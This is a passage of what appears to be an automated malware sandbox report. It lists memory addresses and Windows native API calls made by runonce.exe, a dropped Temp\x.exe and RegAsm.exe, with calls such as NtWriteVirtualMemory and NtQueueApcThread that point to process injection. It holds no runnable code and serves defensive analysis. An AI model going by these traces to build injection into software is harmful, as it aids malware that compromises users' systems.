                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2DD0 NtDelayExecution,LdrInitializeThunk,10_2_052C2DD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2C60 NtCreateKey,LdrInitializeThunk,10_2_052C2C60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_052C2C70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_052C2CA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2F30 NtCreateSection,LdrInitializeThunk,10_2_052C2F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2FB0 NtResumeThread,LdrInitializeThunk,10_2_052C2FB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2FE0 NtCreateFile,LdrInitializeThunk,10_2_052C2FE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_052C2E80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_052C2EE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2B60 NtClose,LdrInitializeThunk,10_2_052C2B60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_052C2BA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_052C2BE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_052C2BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2AF0 NtWriteFile,LdrInitializeThunk,10_2_052C2AF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2AD0 NtReadFile,LdrInitializeThunk,10_2_052C2AD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C35C0 NtCreateMutant,LdrInitializeThunk,10_2_052C35C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C39B0 NtGetContextThread,LdrInitializeThunk,10_2_052C39B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2D00 NtSetInformationFile,10_2_052C2D00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2DB0 NtEnumerateKey,10_2_052C2DB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2C00 NtQueryInformationProcess,10_2_052C2C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2CF0 NtOpenProcess,10_2_052C2CF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2CC0 NtQueryVirtualMemory,10_2_052C2CC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2F60 NtCreateProcessEx,10_2_052C2F60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2FA0 NtQuerySection,10_2_052C2FA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2F90 NtProtectVirtualMemory,10_2_052C2F90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2E30 NtWriteVirtualMemory,10_2_052C2E30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2EA0 NtAdjustPrivilegesToken,10_2_052C2EA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2B80 NtQueryInformationFile,10_2_052C2B80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2AB0 NtWaitForSingleObject,10_2_052C2AB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C3010 NtOpenDirectoryObject,10_2_052C3010
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C3090 NtSetValueKey,10_2_052C3090
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C3D10 NtOpenProcessToken,10_2_052C3D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C3D70 NtOpenThread,10_2_052C3D70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03279780 NtDeleteFile,10_2_03279780
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03279680 NtReadFile,10_2_03279680
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03279510 NtCreateFile,10_2_03279510
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03279980 NtAllocateVirtualMemory,10_2_03279980
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03279820 NtClose,10_2_03279820
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0503F2CF NtReadVirtualMemory,10_2_0503F2CF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0503F8C4 NtMapViewOfSection,10_2_0503F8C4
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D928D04_2_00D928D0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D908484_2_00D90848
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D911E04_2_00D911E0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D928C14_2_00D928C1
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D907E04_2_00D907E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004188F35_2_004188F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004030005_2_00403000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004100CA5_2_004100CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042F0D35_2_0042F0D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004100D35_2_004100D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004012405_2_00401240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E2E35_2_0040E2E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004102F35_2_004102F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416AFE5_2_00416AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416B035_2_00416B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004024625_2_00402462
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004024705_2_00402470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E47C5_2_0040E47C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E4275_2_0040E427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E4335_2_0040E433
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004027505_2_00402750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D902C05_2_02D902C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB02745_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E3F05_2_02D1E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD03E65_2_02DD03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCA3525_2_02DCA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA20005_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC81CC5_2_02DC81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD01AA5_2_02DD01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC41A25_2_02DC41A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D981585_2_02D98158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA1185_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D001005_2_02D00100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2C6E05_2_02D2C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0C7C05_2_02D0C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D347505_2_02D34750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D107705_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBE4F65_2_02DBE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC24465_2_02DC2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB44205_2_02DB4420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD05915_2_02DD0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D105355_2_02D10535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0EA805_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC6BD75_2_02DC6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCAB405_2_02DCAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E8F05_2_02D3E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF68B85_2_02CF68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1A8405_2_02D1A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D128405_2_02D12840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A05_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DDA9A65_2_02DDA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D269625_2_02D26962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCEEDB5_2_02DCEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D22E905_2_02D22E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCCE935_2_02DCCE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10E595_2_02D10E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCEE265_2_02DCEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D02FC85_2_02D02FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1CFE05_2_02D1CFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8EFA05_2_02D8EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D84F405_2_02D84F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D30F305_2_02D30F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB2F305_2_02DB2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D52F285_2_02D52F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00CF25_2_02D00CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0CB55_2_02DB0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10C005_2_02D10C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0ADE05_2_02D0ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D28DBF5_2_02D28DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DACD1F5_2_02DACD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1AD005_2_02D1AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2B2C05_2_02D2B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB12ED5_2_02DB12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D152A05_2_02D152A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D5739A5_2_02D5739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFD34C5_2_02CFD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC132D5_2_02DC132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D170C05_2_02D170C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBF0CC5_2_02DBF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC70E95_2_02DC70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCF0E05_2_02DCF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1B1B05_2_02D1B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DDB16B5_2_02DDB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D4516C5_2_02D4516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFF1725_2_02CFF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC16CC5_2_02DC16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D556305_2_02D55630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCF7B05_2_02DCF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D014605_2_02D01460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCF43F5_2_02DCF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD95C35_2_02DD95C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAD5B05_2_02DAD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC75715_2_02DC7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBDAC65_2_02DBDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D55AA05_2_02D55AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DADAAC5_2_02DADAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB1AA35_2_02DB1AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFA495_2_02DCFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC7A465_2_02DC7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D83A6C5_2_02D83A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D85BF05_2_02D85BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D4DBF95_2_02D4DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2FB805_2_02D2FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFB765_2_02DCFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D138E05_2_02D138E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7D8005_2_02D7D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D199505_2_02D19950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2B9505_2_02D2B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA59105_2_02DA5910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D19EB05_2_02D19EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D11F925_2_02D11F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFFB15_2_02DCFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFF095_2_02DCFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFCF25_2_02DCFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D89C325_2_02D89C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2FDC05_2_02D2FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC1D5A5_2_02DC1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D13D405_2_02D13D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC7D735_2_02DC7D73
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529053510_2_05290535
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0535059110_2_05350591
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533442010_2_05334420
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534244610_2_05342446
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533E4F610_2_0533E4F6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529077010_2_05290770
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052B475010_2_052B4750
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528C7C010_2_0528C7C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AC6E010_2_052AC6E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528010010_2_05280100
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532A11810_2_0532A118
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0531815810_2_05318158
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053441A210_2_053441A2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053501AA10_2_053501AA
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053481CC10_2_053481CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532200010_2_05322000
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534A35210_2_0534A352
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053503E610_2_053503E6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529E3F010_2_0529E3F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533027410_2_05330274
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053102C010_2_053102C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529AD0010_2_0529AD00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532CD1F10_2_0532CD1F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052A8DBF10_2_052A8DBF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528ADE010_2_0528ADE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05290C0010_2_05290C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05330CB510_2_05330CB5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05280CF210_2_05280CF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05332F3010_2_05332F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052D2F2810_2_052D2F28
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052B0F3010_2_052B0F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05304F4010_2_05304F40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0530EFA010_2_0530EFA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529CFE010_2_0529CFE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05282FC810_2_05282FC8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534EE2610_2_0534EE26
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05290E5910_2_05290E59
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534CE9310_2_0534CE93
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052A2E9010_2_052A2E90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534EEDB10_2_0534EEDB
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052A696210_2_052A6962
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052929A010_2_052929A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0535A9A610_2_0535A9A6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529A84010_2_0529A840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529284010_2_05292840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052768B810_2_052768B8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052BE8F010_2_052BE8F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534AB4010_2_0534AB40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05346BD710_2_05346BD7
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528EA8010_2_0528EA80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534757110_2_05347571
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532D5B010_2_0532D5B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053595C310_2_053595C3
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534F43F10_2_0534F43F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528146010_2_05281460
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534F7B010_2_0534F7B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052D563010_2_052D5630
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053416CC10_2_053416CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C516C10_2_052C516C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0527F17210_2_0527F172
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0535B16B10_2_0535B16B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529B1B010_2_0529B1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534F0E010_2_0534F0E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053470E910_2_053470E9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052970C010_2_052970C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533F0CC10_2_0533F0CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534132D10_2_0534132D
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0527D34C10_2_0527D34C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052D739A10_2_052D739A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052952A010_2_052952A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053312ED10_2_053312ED
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AB2C010_2_052AB2C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05347D7310_2_05347D73
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05293D4010_2_05293D40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05341D5A10_2_05341D5A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AFDC010_2_052AFDC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05309C3210_2_05309C32
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FCF210_2_0534FCF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FF0910_2_0534FF09
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FFB110_2_0534FFB1
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05291F9210_2_05291F92
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05253FD510_2_05253FD5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05253FD210_2_05253FD2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05299EB010_2_05299EB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532591010_2_05325910
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529995010_2_05299950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AB95010_2_052AB950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052FD80010_2_052FD800
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052938E010_2_052938E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FB7610_2_0534FB76
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AFB8010_2_052AFB80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05305BF010_2_05305BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052CDBF910_2_052CDBF9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05303A6C10_2_05303A6C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05347A4610_2_05347A46
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FA4910_2_0534FA49
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052D5AA010_2_052D5AA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05331AA310_2_05331AA3
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532DAAC10_2_0532DAAC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533DAC610_2_0533DAC6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03261FD010_2_03261FD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325CE4710_2_0325CE47
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325CE5010_2_0325CE50
